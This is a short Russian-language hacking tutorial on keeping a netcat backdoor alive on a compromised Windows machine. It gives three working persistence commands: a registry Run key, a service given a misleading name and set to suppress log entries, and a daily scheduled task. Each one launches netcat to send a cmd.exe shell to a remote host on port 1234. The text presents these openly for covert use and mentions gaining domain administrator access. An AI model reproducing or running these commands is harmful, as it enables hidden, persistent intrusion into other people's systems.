netcat
1. Бекдоринг netcat’ом – путем добавления соответствующего ключа в ветку реестра для автозапуска:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d “c:\windows\nc.exe –d 192.168.1.70 1234 –e cmd.exe”
При последующем логине в систему произойдет запуск netcat с открытием шелла на 1234 порту. Нюанс тут в том, что бекдор исполнится с правами того пользователя, который залезет на эту машину. Поэтому такие действия вполне могут открыть доступ полноценного администратора домена.
2. Исполнение бекдора в режиме «Windows Service». Вообще, netcat никогда не был заточен под виндовую службу, но, извратившись, мы можем сделать его таковым:
sc create Network Connections Service binPath= “cmd /K start c:\nc.exe –d 192.168.1.70 1234 –e cmd.exe” start= auto error= ignore
Командой SC создается сервис с несуществующим именем (чтобы в глаза не бросалось) «Network Connections Service». Флаг start= auto указывает, чтобы сервис запускался сразу после загрузки ОС, а error=ignore – запрещает посылать какие-либо логи в системный журнал. Если все сделано правильно, то тебя обрадует надпись «[SC] CreateService SUCCESS». Соль в том, что даже если операционка будет перезапущена, с ее включением бекдор вновь начнет свою работу.
3. Запуск netcat с использованием Windows Task Sheduler (планировщика задач). Как вариант, можно запустить netcat в определенное время, а именно – когда темно и тихо. В этом нам поможет встроенный в Windows планировщик.
net start schedule
at 12:00:00 /every:m,t,w,th,f,s,su “”c:\nc.exe –d 192.168.1.70 1234 –e cmd.exe””
Каждый день (буквы отвечают за дни недели), в 12:00:00 у нас будет открываться шелл.